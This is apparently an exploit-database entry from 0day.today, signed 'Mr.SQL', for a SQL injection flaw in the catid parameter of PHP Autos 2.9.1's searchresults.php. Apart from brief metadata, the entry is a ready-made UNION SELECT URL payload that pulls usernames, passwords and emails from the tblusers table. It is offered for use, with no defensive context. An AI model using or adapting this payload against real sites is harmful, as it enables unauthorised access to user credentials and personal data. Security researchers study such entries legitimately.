PHP Autos 2.9.1 (searchresults.php catid) SQL Injection Vulnerability

2008-10-07T00:00:00
ID 1337DAY-ID-3852
Type zdt
Reporter Mr.SQL
Modified 2008-10-07T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================================
PHP Autos 2.9.1 (searchresults.php catid) SQL Injection Vulnerability
=====================================================================


###############################################################
##
## Remote SQL Injection Vulnerability
##
## PHP Auto's V2.9.1 ( searchresults.php catid )
##
## http://www.phpautos.com/
###############################################################
###############################################################
## AuTh0r : Mr.SQL
########################
########################
##
## -[[: Exploite :]]-
##
## www.TraGeT./searchresults.php?catid=-1'/**/UNION/**/SELECT/**/0,0,CONCAT_WS(0x3a,username,password,email)MrSQL,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+tblusers/*
##
########################
########################




#  0day.today [2016-04-19]  #